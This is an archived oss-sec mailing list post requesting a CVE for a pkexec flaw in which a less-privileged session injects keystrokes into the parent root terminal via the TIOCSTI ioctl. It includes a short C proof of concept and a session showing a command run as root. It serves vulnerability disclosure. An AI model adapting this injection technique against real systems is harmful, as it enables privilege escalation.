oss-sec mailing list archives
CVE Request: pkexec tty hijacking via TIOCSTI ioctl
From: up201407890 () alunos dcc fc up pt
Date: Thu, 25 Feb 2016 12:15:11 +0100
Bug report to redhat: https://bugzilla.redhat.com/show_bug.cgi?id=1300746When executing a program via "pkexec --user nonpriv program" the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the
terminal's input buffer, allowing privilege escalation.This issue has been fixed in "su" by calling setsid() and in "sudo" by using the
"use_pty" flag. # cat test.c #include <sys/ioctl.h> int main() { char *cmd = "id\n"; while(*cmd) ioctl(0, TIOCSTI, cmd++); } # gcc test.c -o test # id saken uid=1000(saken) gid=1000(saken) groups=1000(saken) # pkexec --user saken ./test ----> last command i type in id # id ----> did not type this uid=0(root) gid=0(root) groups=0(root) This is similar to CVE-2005-4890 and CVE-2013-6409 I'd like to request a CVE for this issue. PS: I don't believe any of the previous mentions of fixes for "su" and "sudo" would work here, since executing a shell via pkexec would make it not have job control. Thanks, Federico Bento ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program.
Current thread:
- CVE Request: pkexec tty hijacking via TIOCSTI ioctl up201407890 (Feb 25)
- Re: CVE Request: pkexec tty hijacking via TIOCSTI ioctl cve-assign (Feb 25)